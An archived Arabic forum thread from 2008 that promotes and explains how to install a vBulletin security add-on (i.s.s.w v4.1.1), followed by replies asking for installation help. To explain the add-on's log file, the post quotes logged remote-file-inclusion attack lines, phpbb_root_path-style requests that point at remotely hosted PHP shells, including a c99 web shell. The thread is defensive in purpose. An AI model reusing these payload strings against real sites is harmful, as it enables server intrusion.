الويب العربي

الويب العربي (http://www.arabwebtalk.com/index.php)
-   قسم المنتديات (http://www.arabwebtalk.com/forumdisplay.php?f=112)
-   -   هاك الحماية الجديد والمميز من الاختراقات شرح بالصور (http://www.arabwebtalk.com/showthread.php?t=94327)

طويلع 08-10-2008 04:49 AM
هاك الحماية الجديد والمميز من الاختراقات شرح بالصور
 
السلام عليكم ورحمة الله وبركاته

ان استفدت من الهاك الله لا يهينكم لي طلب تحت تنفذونه ولا عليكم أمر . . . :tears:

نخش بالموضوع / :shiny01:


اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :

1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني



عمل الهاك : حماية المنتدى بشكل كامل بعون الله





الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل


كود PHP:
2007-12-1105:50:441197370244209.67.223.188p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808 
2007-12-1106:32:221197372742203.211.135.147t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808 

2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79 
2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 
الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

كود PHP:
التاريخ والوقت



كود PHP:
2007-12-1105:50:44
عدد المحاولات

كود PHP:
1197370244 
ايبي الموقع المصااب


كود PHP:
209.67.223.188 
الاصابة طبعا تشفرت لاغراض امنيه

كود PHP:
p=11575//codebb/lang_select 
الاستغلال

كود PHP:
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 
نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه

كود PHP:
libwww-perl/5.808 
الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث


شرح حذف الهاك


من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت


تم تجربت المنتج على الاصدار

3.6.x

3.7.0


لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

يطرحه هنا في الموضوع لنصل لتطوير اكثر


وجل من لا يخطأ وشكرا لكم


لتتبع جديد الهاك على الرابط التالي

http://www.is-sw.net/index.php?issw=isswvb

الحمد لله على كل شيء

لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم



التحميل لاخر اصدار هنا

تم اصلاح مشكله الفوتر
تم ترقيه عدت دوال جديده مستخدمه للهكر لعرض config
تم عمل نظام التحديث والتنزيل من لوحت تحكم المنتدي
طرق الترقيه فقط ارفع ملف البرودكت مع السماح لخيار الكتابه في الاختيار نعم

وشكرا لكم

( نقل متعوب عليه ونقلته لكم للفائدة الكبيرة منه وقد أوصى به أحد رجال الدعم الفني لي به معرفة )

------------------

بتلاحظون حقوق الهاك أسفل بالفوتر للمشاهدة www.tabukedu.com/vb تحصلونه بالأسفل باسم / i.s.s.w


:D: الهاك مجرب ويعمل بشكل صحيح ولله الحمد والمنة وألف ألف مبروك عليكم جميع

:D ان استفدت لا هنتم نقرة على الرابط www.tabukedu.com/vb :blushing: وبسسس ولا ما استاهل :tears: :nosweat:

oman heart 20-01-2009 02:09 PM
إقتباس:
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

ما فهمت كيف أرفع السكيور وأعطي التصريح ياريت لو تشرحلي اياه بطريقه اقدر أفهمها ولو بالشرح بالصور وأكون شاكرلك


يسلمووو

oman heart 22-01-2009 06:23 PM
شكرا أخي الكريم بالنهايه فهمت بس سؤال كيف أتعرف انه المنتدي الان محمي وكيف أعرف ثغرات المنتدي ؟؟؟؟؟


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 07:41 PM.

Powered by vBulletin
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Copyright © ArabWebTalk.Com 2004-2012